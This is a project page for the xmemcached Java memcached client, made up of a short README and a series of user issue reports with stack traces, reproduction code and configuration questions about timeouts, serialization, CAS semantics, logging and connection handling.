
xmemcached's Introduction


News

  • 2.4.8 released with some minor fixes.
  • 2.4.7 released, supporting the MemcachedSessionComparator and resolveInetAddresses settings and tweaking the benchmark projects.
  • 2.4.6 released, allowing timeoutExceptionThreshold to be set through XMemcachedClientFactoryBean.

Introduction

XMemcached is a high-performance, easy-to-use blocking multithreaded memcached client in Java.

It is NIO based and was carefully tuned for top performance.

Quick start:

Contribute

Fork the source code and check it out to your local machine. Make your changes and create a pull request.

Use docker and docker-compose to set up the test environment:

$ cd xmemcached
$ docker-compose up -d

Run unit tests:

$ mvn test

Run integration tests:

$ mvn integration-test

Thanks to all contributors, you make xmemcached better.

Contributors

License

Apache License Version 2.0

xmemcached's People

Contributors

ayman-abdelghany, bmahe, bmahe-tango, chenzhang22, docdoc, hxy1991, jlleitschuh, killme2008, liuzheqiang, markrmullan, mirlord, profondometer, raiv, saschat, spudone, tomjiang1987, wolfg1969


xmemcached's Issues

java.util.concurrent.TimeoutException

We are seeing bursts of this exception in production for various memcache operations. Stack traces look similar to this:

java.util.concurrent.TimeoutException: Timed out(5000 milliseconds) waiting for operation while connected to 127.0.0.1:11211
    at net.rubyeye.xmemcached.XMemcachedClient.latchWait(XMemcachedClient.java:2536)
    at net.rubyeye.xmemcached.XMemcachedClient.sendStoreCommand(XMemcachedClient.java:2498)
    at net.rubyeye.xmemcached.XMemcachedClient.set(XMemcachedClient.java:1338)
    at net.rubyeye.xmemcached.XMemcachedClient.set(XMemcachedClient.java:1408)

We could not pinpoint the exact cause, but one of the suspects is how XMemcached handles server responses.

One situation that can be reproduced in a standalone Java project is how the XMemcached client handles server responses for values larger than 1 MB (the default maximum item size in memcached).

In the code below, our expectation is to get a MemcachedServerException with the message "object too large for cache" for the "set" operation, but instead we are getting java.util.concurrent.TimeoutException.

It is worth noting that the spymemcached client, used in the same code, handles the server response properly and returns "SERVER_ERROR object too large for cache".

import net.rubyeye.xmemcached.MemcachedClient;
import net.rubyeye.xmemcached.XMemcachedClientBuilder;
import net.rubyeye.xmemcached.transcoders.SerializingTranscoder;
import net.rubyeye.xmemcached.utils.AddrUtil;

import java.io.IOException;
import java.util.Arrays;

public class LargeObjectsWithXMemcachedClient {

    private static final String KEY_LARGE_OBJECT = "largeObject";

    public static void main(String[] args) throws IOException {
        int megabyte_plus1 = 1048577; //1024 * 1024 + 1

        System.out.println("Building xmemcached client");

        XMemcachedClientBuilder builder = new XMemcachedClientBuilder(AddrUtil.getAddresses("localhost:11211"));
        MemcachedClient client = builder.build();

        // making sure that payload does not get compressed and client does not throw exception on max size limit
        // so that large value gets sent to memcached server. We expect xmemcached client to
        // throw MemcachedServerException with message "object too large for cache"
        SerializingTranscoder transcoder = new SerializingTranscoder(megabyte_plus1 * 2); // something bigger than memcached daemon max value size.
        transcoder.setCompressionThreshold(transcoder.getMaxSize()); // bumping up compression threshold so that xmemcached client does not compress.

        try {
            String largeObject = createString(megabyte_plus1);

            System.out.println("set " + KEY_LARGE_OBJECT);
            client.set(KEY_LARGE_OBJECT, 60, largeObject, transcoder);

            String readLargeObject = client.get(KEY_LARGE_OBJECT);
            System.out.println("get " + KEY_LARGE_OBJECT + ": " + (readLargeObject == null ? "does not exist in cache" : "size() = " + readLargeObject.length()));

            System.out.println("done");
        } catch (Exception exception) {
          exception.printStackTrace();
        } finally {
            System.out.println("shutting down memcached client");
            client.shutdown();
        }
    }

    private static String createString(int size) {
        char[] chars = new char[size];
        Arrays.fill(chars, 'f');
        return new String(chars);
    }
}

Errors when accessing kestrel

Test code

XMemcachedClientBuilder builder = new XMemcachedClientBuilder(AddrUtil.getAddresses(hosts));
builder.getConfiguration().setSessionIdleTimeout(10000);
builder.setCommandFactory(new KestrelCommandFactory());
memcachedClient=builder.build();
memcachedClient.setPrimitiveAsString(true);
memcachedClient.setOptimizeGet(false);
memcachedClient.setOpTimeout(10000);

for (int i = 0; i < 1; i++) {
    new Thread(new Runnable() {
        @Override
        public void run() {
            memcachedClient.get("aaa/t=2000");
        }
    }).start();
}
for (int i = 0; i < 1; i++) {
    new Thread(new Runnable() {
        @Override
        public void run() {
            memcachedClient.set("aaab", "asdf");
        }
    }).start();
}

net.rubyeye.xmemcached.exception.MemcachedDecodeException: Decode error,session will be closed,line=STORED
at net.rubyeye.xmemcached.command.Command.decodeError(Command.java:259)
at net.rubyeye.xmemcached.command.Command.decodeError(Command.java:270)
at net.rubyeye.xmemcached.command.text.TextGetCommand.decode(TextGetCommand.java:126)
at net.rubyeye.xmemcached.codec.MemcachedDecoder.decode0(MemcachedDecoder.java:61)
at net.rubyeye.xmemcached.codec.MemcachedDecoder.decode(MemcachedDecoder.java:56)
at com.google.code.yanf4j.nio.impl.NioTCPSession.decode(NioTCPSession.java:288)
at com.google.code.yanf4j.nio.impl.NioTCPSession.readFromBuffer(NioTCPSession.java:205)
at com.google.code.yanf4j.nio.impl.AbstractNioSession.onRead(AbstractNioSession.java:198)
at com.google.code.yanf4j.nio.impl.AbstractNioSession.onEvent(AbstractNioSession.java:343)
at com.google.code.yanf4j.nio.impl.SocketChannelController.dispatchReadEvent(SocketChannelController.java:56)
at com.google.code.yanf4j.nio.impl.NioController.onRead(NioController.java:157)
at com.google.code.yanf4j.nio.impl.Reactor.dispatchEvent(Reactor.java:294)
at com.google.code.yanf4j.nio.impl.Reactor.run(Reactor.java:141)

But when memcachedClient.get("aaa/t=2000"); is replaced with memcachedClient.get("aaa");, it works fine.

I read the source code and found that there is only one session bound to each channel; commands are put into a queue and then sent one by one. In the first case, the get blocks without a response; when the set response comes back, the client fetches the first in-flight command, which is the get, but the response is STORED, so the error occurs.

This depends on the response order, but the server cannot guarantee that the first command sent gets the first response.

Can you explain why it is designed like that?
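The ordering problem described above can be sketched without any xmemcached code: a client pipelining commands over one connection matches each response against the oldest in-flight command, so a transport that answers out of order (as kestrel can) makes the decoder see a reply of the wrong type. A minimal illustrative simulation, with hypothetical names and none of the library's internals:

```java
import java.util.ArrayDeque;
import java.util.Deque;

// Sketch of a FIFO command queue: the decoder always matches a response
// against the oldest in-flight command, so an out-of-order reply (STORED
// arriving while a get is still pending) cannot be parsed.
public class PipelineMismatch {
    public static String decode(Deque<String> inflight, String responseLine) {
        String command = inflight.poll(); // oldest command owns the next response
        if (command.startsWith("get") && responseLine.equals("STORED")) {
            return "DECODE_ERROR"; // a get decoder cannot parse a STORED reply
        }
        return "OK";
    }

    public static void main(String[] args) {
        Deque<String> inflight = new ArrayDeque<>();
        inflight.add("get aaa/t=2000"); // blocking kestrel get, no reply yet
        inflight.add("set aaab");
        // kestrel answers the set first, violating the FIFO assumption
        System.out.println(decode(inflight, "STORED")); // DECODE_ERROR
    }
}
```

This is exactly why a strictly pipelined text protocol needs first-come, first-answered responses from the server.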

Caught IOException decoding bytes of data due to StreamCorruptedException: invalid stream header

We are only setting and getting a large String value.

ERROR net.rubyeye.xmemcached.transcoders.BaseSerializingTranscoder - Caught IOException decoding 5318 bytes of data
java.io.StreamCorruptedException: invalid stream header: 613A333A
at java.io.ObjectInputStream.readStreamHeader(ObjectInputStream.java:800)
at java.io.ObjectInputStream.<init>(ObjectInputStream.java:297)
at net.rubyeye.xmemcached.transcoders.BaseSerializingTranscoder$1.<init>(BaseSerializingTranscoder.java:95)
at net.rubyeye.xmemcached.transcoders.BaseSerializingTranscoder.deserialize(BaseSerializingTranscoder.java:95)
at net.rubyeye.xmemcached.transcoders.SerializingTranscoder.decode0(SerializingTranscoder.java:92)
at net.rubyeye.xmemcached.transcoders.SerializingTranscoder.decode(SerializingTranscoder.java:86)
at net.rubyeye.xmemcached.XMemcachedClient.fetch0(XMemcachedClient.java:657)
at net.rubyeye.xmemcached.XMemcachedClient.get0(XMemcachedClient.java:1058)
at net.rubyeye.xmemcached.XMemcachedClient.get(XMemcachedClient.java:1016)
at net.rubyeye.xmemcached.XMemcachedClient.get(XMemcachedClient.java:1027)
at net.rubyeye.xmemcached.XMemcachedClient.get(XMemcachedClient.java:1049)
at com.google.code.ssm.providers.xmemcached.MemcacheClientWrapper.get(MemcacheClientWrapper.java:133)
at com.google.code.ssm.CacheImpl.get(CacheImpl.java:256)
at com.google.code.ssm.CacheImpl.get(CacheImpl.java:101)
at com.google.code.ssm.spring.SSMCache.get(SSMCache.java:82)

XMemcachedClientFactoryBean still uses deprecated BufferAllocator without alternative

XMemcachedClientFactoryBean makes use of the deprecated BufferAllocator, which itself uses the deprecated IoBuffer, all of which are defined within this package. No alternatives or newer versions are stipulated in the deprecation comments.

Please enrich the comments to help API consumers understand the intended alternatives to BufferAllocator, SimpleBufferAllocator, IoBuffer and CachedBufferAllocator. Thanks.

A question about cas behavior

The version is 2.0.
What is the behavior of a cas operation when updating a key that does not exist in memcached?

In my own testing with net.rubyeye.xmemcached.XMemcachedClient#cas(java.lang.String, int, java.lang.Object, long): if the 4th argument is 0, a new key-value pair is inserted. If the 4th (cas) argument is not 0, no new key-value pair is inserted. Why is that?

When I connect to memcached directly via telnet and try to reproduce this, the server returns NOT_FOUND regardless of whether the cas value I send is 0 or not; it never inserts successfully when the value is 0.

The client behavior and the direct telnet behavior seem inconsistent. Is this a bug or an extra feature?
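A likely explanation, which is an assumption on my part and worth verifying against the client's command factory: in memcached's binary protocol, a CAS value of 0 conventionally means "no version check", so a cas with 0 degenerates to an unconditional store, while telnet speaks the text protocol, where cas on a missing key returns NOT_FOUND. A toy model of the two semantics:

```java
import java.util.HashMap;
import java.util.Map;

// Toy model of the semantic difference: in the binary protocol a CAS value
// of 0 is treated as "no version check" so the store succeeds even for a
// missing key; the text protocol returns NOT_FOUND for a missing key.
public class CasSemantics {
    static final Map<String, long[]> store = new HashMap<>(); // key -> {casId}
    static long nextCas = 1;

    static String binaryCas(String key, long cas, String value) {
        long[] entry = store.get(key);
        if (cas == 0 || (entry != null && entry[0] == cas)) {
            store.put(key, new long[] { nextCas++ }); // unconditional or matching
            return "STORED";
        }
        return entry == null ? "NOT_FOUND" : "EXISTS";
    }

    static String textCas(String key, long cas, String value) {
        long[] entry = store.get(key);
        if (entry == null) return "NOT_FOUND"; // text protocol: missing key
        if (entry[0] != cas) return "EXISTS";
        store.put(key, new long[] { nextCas++ });
        return "STORED";
    }
}
```

Under this reading, the client's "insert on cas 0" is binary-protocol behavior, not a bug in either tool.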

Java and PHP sharing memcached: hash algorithms never agree

PHP uses the following settings:

$mem->setOption(Memcached::OPT_DISTRIBUTION,Memcached::DISTRIBUTION_CONSISTENT);
$mem->setOption(Memcached::OPT_LIBKETAMA_COMPATIBLE,true);

java:
builder.setSessionLocator(new KetamaMemcachedSessionLocator());

PHP uses the memcached extension. We started with the default settings, which did not match; we then switched to KETAMA, but it still does not work.

XMemcached pooled client Recv Q size is very high

Hi,

We've been using XMemcachedClient connected to twemproxy, which sits in front of a set of memcached servers. We've kept an OpTimeout of 30 ms.

Over time, the Recv-Q size (from netstat) of the TCP socket grows really high, prompting timeouts from XMemcached. As a result, twemproxy is also gradually being killed by going OOM.

Is the XMemcached client slow in receiving data? Should TCP_RECV_BUFF_SIZE be increased?

Few more details:

  1. XMemcached version: 2.4.0
  2. Protocol: Text Protocol
  3. Session Idle Timeout: 60 secs
  4. timeoutExceptionThreshold: 250000
  5. healSessionInterval: 1 sec
  6. Pool Size: 20
  7. Throughput: ~ 2.2K QPS
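Whether a larger receive buffer would help can be probed with a plain JDK socket, independent of xmemcached; note the OS may cap or round the requested SO_RCVBUF, so the granted value should always be read back:

```java
import java.io.IOException;
import java.net.Socket;

// Requesting a larger SO_RCVBUF on a plain socket and reading back what the
// OS actually granted. This only illustrates the TCP knob itself; it is not
// xmemcached configuration.
public class RecvBufferCheck {
    public static int requestReceiveBuffer(int requestedBytes) {
        try (Socket socket = new Socket()) {
            socket.setReceiveBufferSize(requestedBytes); // hint to the OS
            return socket.getReceiveBufferSize();        // value actually granted
        } catch (IOException e) {
            return -1;
        }
    }
}
```

A persistently full Recv-Q usually means the reader thread cannot drain data fast enough, so the buffer size is only part of the picture.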

Initialization information from the client logged as warnings

When I start the application, I get the following information as WARNs. Shouldn't these be INFOs?

WARN net.rubyeye.xmemcached.XMemcachedClient - XMemcachedClient is using Binary protocol
WARN c.google.code.yanf4j.core.impl.AbstractController - The Controller started at localhost/127.0.0.1:0 ...
WARN c.google.code.yanf4j.core.impl.AbstractController - Add a session: 127.0.0.1:11211

Thanks,
estefanog

Disable log4j logging?

This might be a silly question but how do I stop xmemcached from logging output when log4j is configured for DEBUG:

log4j.rootLogger = DEBUG, CONSOLE, LOGFILE

I don't want to see xmemcached's DEBUG logging when I'm debugging my application.

Thanks
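One way to do this with log4j 1.x properties (a sketch; the appender names are the ones from the snippet above) is to raise the level for the xmemcached packages while leaving the root logger at DEBUG:

```properties
# Root stays at DEBUG for the application itself
log4j.rootLogger = DEBUG, CONSOLE, LOGFILE

# Silence xmemcached and its networking layer below WARN
log4j.logger.net.rubyeye.xmemcached = WARN
log4j.logger.com.google.code.yanf4j = WARN
```

Per-package logger levels override the root level, so your own DEBUG output is unaffected.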

Advice: add more comments to the source code

Hi, I'm using xmemcached all the time.

Your source code is well written and I've learned so much.

It would be very kind of you to add more comments to the source code.

Thanks very much.

unable to GET a value from memcached which was set by a C# client

Hi,

I encountered a weird issue: the XMemcached client is not able to get a String value from memcached that was set by the C# Enyim client. However, the value can be accessed and read via telnet and via the Python memcache client. Please let me know if you have any suggestions to solve this problem. Thanks!

2018-01-11 11:08:06.655 [ERROR] [main] BaseSerializingTranscoder: Failed to decompress data
java.util.zip.ZipException: Not in GZIP format
at java.util.zip.GZIPInputStream.readHeader(GZIPInputStream.java:165) ~[?:1.8.0_144]
at java.util.zip.GZIPInputStream.<init>(GZIPInputStream.java:79) ~[?:1.8.0_144]
at java.util.zip.GZIPInputStream.<init>(GZIPInputStream.java:91) ~[?:1.8.0_144]
at net.rubyeye.xmemcached.transcoders.BaseSerializingTranscoder.gzipDecompress(BaseSerializingTranscoder.java:274) [xmemcached-2.4.0.jar:?]
at net.rubyeye.xmemcached.transcoders.BaseSerializingTranscoder.decompress(BaseSerializingTranscoder.java:219) [xmemcached-2.4.0.jar:?]
at net.rubyeye.xmemcached.transcoders.SerializingTranscoder.decode(SerializingTranscoder.java:87) [xmemcached-2.4.0.jar:?]
at net.rubyeye.xmemcached.XMemcachedClient.fetch0(XMemcachedClient.java:657) [xmemcached-2.4.0.jar:?]
at net.rubyeye.xmemcached.XMemcachedClient.get0(XMemcachedClient.java:1085) [xmemcached-2.4.0.jar:?]
at net.rubyeye.xmemcached.XMemcachedClient.get(XMemcachedClient.java:1043) [xmemcached-2.4.0.jar:?]
at net.rubyeye.xmemcached.XMemcachedClient.get(XMemcachedClient.java:1065) [xmemcached-2.4.0.jar:?]

Got "Incr/Decr on non-numeric value" exception

I'm using SerializingTranscoder. With primitiveAsString = false (the default), I get the exception "Incr/Decr on non-numeric value". For example, with memcachedClient.set("inventory", 0, 100); the value actually stored is 'd' (ASCII 100 is 'd').
With primitiveAsString = true, the correct value is stored in memcached and can be incremented or decremented.
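The mysterious 'd' is plain ASCII: without primitiveAsString the integer is stored in a binary form whose byte 100 renders as the character 'd', and memcached's incr/decr only accepts values that are decimal ASCII strings. A small JDK-only demonstration:

```java
import java.nio.charset.StandardCharsets;

// Why the stored value looks like 'd': byte 100 is the ASCII code for 'd'.
// memcached's incr/decr only works on values that are decimal ASCII strings,
// which is what primitiveAsString = true produces ("100" as three bytes).
public class NumericStorage {
    public static void main(String[] args) {
        byte rawByte = 100;
        System.out.println((char) rawByte); // prints 'd'
        byte[] asString = Integer.toString(100).getBytes(StandardCharsets.US_ASCII);
        System.out.println(asString.length); // 3 bytes: '1', '0', '0'
    }
}
```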

Support for AWS Elasticache Autodiscovery

Request to add support for AWS Autodiscovery to xmemcached
http://docs.aws.amazon.com/AmazonElastiCache/latest/UserGuide/AutoDiscovery.html

Amazon forked the spy client to provide an implementation of this functionality:
awslabs/aws-elasticache-cluster-client-memcached-for-java@70bf764

But we have had recurring problems with the spy client and much prefer xmemcached.

The only problem with xmemcached is that there is no built-in recovery mechanism if a node is replaced after the client has initialized. A new node will have the same URL but a different IP address.

Any interest?

using one MemcachedClient per node in the cluster

I am using AWS clusters, but in an unusual way. For my needs, scaling up and down is far burstier than most: I go from 2 nodes to 8, or from 8 nodes to 2, so consistent hashing doesn't help much. What I want instead is, on each of my Java client machines that talk to the cluster, one of your MemcachedClient instances per node, so there is no need for consistent hashing. When I scale up from 2 nodes to 8, I record that the primary node count is now 8 and the secondary node count is 2. When I do a get(), I first use my own murmur3 hash modulo the primary node count (8) to select the appropriate MemcachedClient; if that fails, my getter tries the node given by the hash modulo the secondary count (2), and if the value is found there, adds it to the new primary node. Thus, instead of consistent hashing, I pay the cost of two gets and a possible migration when the mapping lands on the wrong node after a scale-up.

My question is: does your NIO-based library handle the construction of many MemcachedClient objects, one per node, in a performant way, or did you design it to only work well with one MemcachedClient object for the entire cluster?

Exception trace output from BaseSerializingTranscoder if objects are no longer compatible

If an object retrieved from the cache is no longer compatible with the current class in the running application, memcachedClient.get(..) correctly returns null but also prints an exception trace like:

10:19:48,504 ERROR [net.rubyeye.xmemcached.transcoders.BaseSerializingTranscoder] (default task-110) Caught IOException decoding 8002 bytes of data: java.io.InvalidClassException: com.my.package.my.class; local class incompatible: stream classdesc serialVersionUID = 7737855311941045290, local class serialVersionUID = -351616861165941259
	at java.io.ObjectStreamClass.initNonProxy(ObjectStreamClass.java:616)
	at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1630)
	at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)
	at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1781)
	at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1353)
	at java.io.ObjectInputStream.readObject(ObjectInputStream.java:373)
	at java.util.ArrayList.readObject(ArrayList.java:791)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:498)
	at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1058)
	at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1909)
	at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1808)
	at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1353)
	at java.io.ObjectInputStream.readObject(ObjectInputStream.java:373)
	at net.rubyeye.xmemcached.transcoders.BaseSerializingTranscoder.deserialize(BaseSerializingTranscoder.java:112)
	at net.rubyeye.xmemcached.transcoders.SerializingTranscoder.decode0(SerializingTranscoder.java:98)
	at net.rubyeye.xmemcached.transcoders.SerializingTranscoder.decode(SerializingTranscoder.java:90)
	at net.rubyeye.xmemcached.XMemcachedClient.fetch0(XMemcachedClient.java:669)
	at net.rubyeye.xmemcached.XMemcachedClient.get0(XMemcachedClient.java:1072)
	at net.rubyeye.xmemcached.XMemcachedClient.get(XMemcachedClient.java:1030)
	at net.rubyeye.xmemcached.XMemcachedClient.get(XMemcachedClient.java:1041)
	at net.rubyeye.xmemcached.XMemcachedClient.get(XMemcachedClient.java:1063)
	at xx.xx.CacheService.cacheGet(CacheService.java:1052)

No exception is thrown to my code that I could catch around memcachedClient.get(..); this output comes from the client itself.
How can I disable it?

I already have the following in my log4j.xml Configuration:

<Configuration >
    <Properties>
        <Property name="log4j.logger.net.rubyeye.xmemcached">false</Property>
        <Property name="log4j.logger.com.google.code.yanf4j">false</Property>
    </Properties>
...
</Configuration>
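For what it's worth, log4j 2 does not read <Property> entries of that form as logger levels; the usual way to silence a package is a <Logger> element inside <Loggers> (a sketch, appender references elided):

```xml
<Configuration>
    <Loggers>
        <!-- Suppress xmemcached's internal decode-error logging -->
        <Logger name="net.rubyeye.xmemcached" level="OFF"/>
        <Logger name="com.google.code.yanf4j" level="OFF"/>
        <Root level="info">
            <!-- appender refs here -->
        </Root>
    </Loggers>
</Configuration>
```

Setting the level to ERROR or FATAL instead of OFF keeps genuinely fatal client messages visible.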


Is the xmemcached framework thread safe?

Recently, I have been using xmemcached with MINA to develop multithreaded projects involving many clients and many servers. I really want to know whether xmemcached is thread safe. Should I create one instance for each client? Thank you for your time.

XMemcached network layout exception

Help ~~
My xmemcached ver is 1.3.5.
I got this error msg:
2016-02-11 06:31:59,912 [xmemcached-read-thread-1-thread-4] ERROR n.r.xmemcached.impl.MemcachedHandler 111 - XMemcached network layout exception
java.lang.OutOfMemoryError: Java heap space
at java.lang.String.substring(String.java:1939) ~[na:1.6.0_45]
at java.lang.String.subSequence(String.java:1972) ~[na:1.6.0_45]
at java.util.regex.Pattern.split(Pattern.java:1002) ~[na:1.6.0_45]
at java.lang.String.split(String.java:2292) ~[na:1.6.0_45]
at java.lang.String.split(String.java:2334) ~[na:1.6.0_45]
at net.rubyeye.xmemcached.command.text.TextVersionCommand.decode(TextVersionCommand.java:66) ~[xmemcached-1.3.5.jar:na]
at net.rubyeye.xmemcached.codec.MemcachedDecoder.decode0(MemcachedDecoder.java:61) ~[xmemcached-1.3.5.jar:na]
at net.rubyeye.xmemcached.codec.MemcachedDecoder.decode(MemcachedDecoder.java:56) ~[xmemcached-1.3.5.jar:na]
at com.google.code.yanf4j.nio.impl.NioTCPSession.decode(NioTCPSession.java:288) ~[xmemcached-1.3.5.jar:na]
at com.google.code.yanf4j.nio.impl.NioTCPSession.readFromBuffer(NioTCPSession.java:205) ~[xmemcached-1.3.5.jar:na]
at com.google.code.yanf4j.nio.impl.AbstractNioSession.onRead(AbstractNioSession.java:198) [xmemcached-1.3.5.jar:na]
at com.google.code.yanf4j.nio.impl.AbstractNioSession.onEvent(AbstractNioSession.java:343) [xmemcached-1.3.5.jar:na]
at com.google.code.yanf4j.nio.impl.SocketChannelController.dispatchReadEvent(SocketChannelController.java:56) [xmemcached-1.3.5.jar:na]
at com.google.code.yanf4j.nio.impl.NioController$ReadTask.run(NioController.java:110) [xmemcached-1.3.5.jar:na]
at java.util.concurrent.ThreadPoolExecutor$Worker.runTask(ThreadPoolExecutor.java:895) [na:1.6.0_45]
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:918) [na:1.6.0_45]
at java.lang.Thread.run(Thread.java:662) [na:1.6.0_45]

NIO Connection Pooling - synchronization

In the wiki, it is written:

XMemcached is based on Java NIO and uses one connection per memcached server by default, which is excellent for most projects. But in some typical high-concurrency environments, this can become a bottleneck, so XMemcached supports an NIO connection pool that can create multiple connections to one memcached server. You should know, however, that they are not synchronized, so you must ensure the synchronization of data updates yourself. You can enable the connection pool with the following code:

I do not understand this part: "...they are not synchronized, so you must make sure the synchronization of data update...".
In which situations is synchronization needed, and why?
Thank you for your help!

Make shutdown hook configurable

In our server, we register a shutdown hook to cleanly shut the server down. We have some high priority tasks that rely on getting a few last things written to memcache. However, with XMemcached, that fails, because its own shutdown hook executes first, killing the connection.

Could we make whether XMemcached uses a shutdown hook configurable (default on)? In our server, we'd turn it off and use our own hook to call .shutdown() on the client.
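Part of the difficulty is that JVM shutdown hooks run concurrently and in unspecified order, so an application hook cannot reliably run before a library-installed one. A JDK-only sketch (hypothetical helper, not an xmemcached API) showing that a hook can at least be registered and removed again while the JVM is still running:

```java
// JVM shutdown hooks run concurrently in unspecified order, which is why a
// library-installed hook can close the connection before application hooks
// finish. A hook can be registered and removed while the JVM is running;
// removeShutdownHook returns true if the hook was still registered.
public class HookControl {
    public static boolean registerAndCancel() {
        Thread hook = new Thread(() -> System.out.println("flushing cache"));
        Runtime.getRuntime().addShutdownHook(hook);
        // ... later, decide to sequence shutdown ourselves instead ...
        return Runtime.getRuntime().removeShutdownHook(hook);
    }
}
```

A configurable flag as proposed (defaulting to on) would let applications own the ordering by calling client.shutdown() from their own hook.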

Session(127.0.0.1:11211) has been closed

Recently I keep getting this error. The same program runs normally on two other servers. The key point is that when the problematic server starts up, some set operations succeed while others fail with this error, and I cannot find the cause.
lt :true -- com.ydqt.pay.common.cache.CacheManager.doAccessCheck(CacheManager.java:165)
net.rubyeye.xmemcached.exception.MemcachedException: Session(127.0.0.1:11211) has been closed
at net.rubyeye.xmemcached.impl.MemcachedConnector.send(MemcachedConnector.java:506)
at net.rubyeye.xmemcached.XMemcachedClient.sendCommand(XMemcachedClient.java:315)
at net.rubyeye.xmemcached.XMemcachedClient.sendStoreCommand(XMemcachedClient.java:2496)
at net.rubyeye.xmemcached.XMemcachedClient.set(XMemcachedClient.java:1338)
at net.rubyeye.xmemcached.XMemcachedClient.set(XMemcachedClient.java:1396)
at net.rubyeye.xmemcached.XMemcachedClient.set(XMemcachedClient.java:1383)
at com.ydqt.pay.common.cache.XmemcachedUtil.set(XmemcachedUtil.java:90)
at com.ydqt.pay.common.cache.CacheManager.doAccessCheck(CacheManager.java:164)
at sun.reflect.GeneratedMethodAccessor81.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
at java.lang.reflect.Method.invoke(Method.java:597)
at org.springframework.aop.aspectj.AbstractAspectJAdvice.invokeAdviceMethodWithGivenArgs(AbstractAspectJAdvice.java:621)
at org.springframework.aop.aspectj.AbstractAspectJAdvice.invokeAdviceMethod(AbstractAspectJAdvice.java:610)
at org.springframework.aop.aspectj.AspectJAroundAdvice.invoke(AspectJAroundAdvice.java:65)
at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172)
at org.springframework.aop.interceptor.ExposeInvocationInterceptor.invoke(ExposeInvocationInterceptor.java:90)
at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172)
at org.springframework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:202)
at $Proxy39.loadUserTotalMonthLimitInfo(Unknown Source)
at com.ydqt.pay.core.job.CacheJob.work_UserTotalMonthLimit(CacheJob.java:163)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
at java.lang.reflect.Method.invoke(Method.java:597)
at org.springframework.scheduling.support.ScheduledMethodRunnable.run(ScheduledMethodRunnable.java:64)
at org.springframework.scheduling.support.DelegatingErrorHandlingRunnable.run(DelegatingErrorHandlingRunnable.java:53)
at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:441)
at java.util.concurrent.FutureTask$Sync.innerRunAndReset(FutureTask.java:317)
at java.util.concurrent.FutureTask.runAndReset(FutureTask.java:150)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$101(ScheduledThreadPoolExecutor.java:98)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.runPeriodic(ScheduledThreadPoolExecutor.java:180)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:204)
at java.util.concurrent.ThreadPoolExecutor$Worker.runTask(ThreadPoolExecutor.java:886)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:908)
at java.lang.Thread.run(Thread.java:662)
2015-06-24 11:31:47 INFO put key: {api_CacheServiceImpl_loadUserTotalMonthLimitInfo_-530343884},obj: {{460036130191220=999999900, 460078116640833=999996500}},result :false -- com.ydqt.pay.common.cache.CacheManager.doAccessCheck(CacheManager.java:165)
2015-06-24 11:31:47 INFO put key: {api_CacheServiceImpl_loadAisleMonthLimitInfo_-422391745},obj: {{1=96600}},result :true

The entry above failed, but the one right below it succeeded again...

Would you consider supporting Spring Boot?

The Spring Boot approach to development is becoming more and more popular: with very little configuration you can use all kinds of combinations. Would you also consider supporting it?

DNS changes require re-instantiating the xmemcached client

If a memcached server is restarted and gets a different IP address when it recovers, the xmemcached client will never notice (as the name is resolved by the builder constructor):

    public XMemcachedClientBuilder(String addressList) {
        this(AddrUtil.getAddresses(addressList));
    }

This is a very serious limitation in many dynamic environments (e.g. AWS).
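The root of the problem is that a resolved InetSocketAddress pins the IP at construction time. The JDK distinguishes resolved from unresolved addresses; whether a given xmemcached version can re-resolve on reconnect is a separate question (the resolveInetAddresses setting added in 2.4.7 appears related):

```java
import java.net.InetSocketAddress;

// A resolved InetSocketAddress captures the IP when constructed; an
// unresolved one keeps only the hostname, so DNS resolution can happen
// later (e.g. on each reconnect). The hostname below is a placeholder.
public class AddressResolution {
    public static void main(String[] args) {
        InetSocketAddress pinned = new InetSocketAddress("localhost", 11211);
        InetSocketAddress lazy =
                InetSocketAddress.createUnresolved("cache.example.internal", 11211);
        System.out.println(pinned.isUnresolved()); // false: IP captured now
        System.out.println(lazy.isUnresolved());   // true: hostname kept as-is
    }
}
```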

TTL setting?

Is there a TTL setting to disconnect connections in the pool after a specific time?

There is no available connection at this moment

xmemcached: 2.0.0
memcached:
STAT pid 20283
STAT uptime 9276
STAT time 1516169080
STAT version 1.4.4
STAT pointer_size 64
STAT rusage_user 0.136979
STAT rusage_system 0.089986
STAT curr_connections 9
STAT total_connections 16
STAT connection_structures 11
STAT cmd_get 57
STAT cmd_set 524
STAT cmd_flush 0
STAT get_hits 2
STAT get_misses 55

But after a certain deployment, a large number of exceptions were thrown:

 <bean name="memcachedClientBuilder" class="net.rubyeye.xmemcached.XMemcachedClientBuilder">
        <!-- XMemcachedClientBuilder have two arguments.First is server list,and second is weights array. -->
        <constructor-arg>
            <list>
                <bean class="java.net.InetSocketAddress">
                    <constructor-arg value="xxx"/>
                    <constructor-arg value="11511"/>
                </bean>
            </list>
        </constructor-arg>
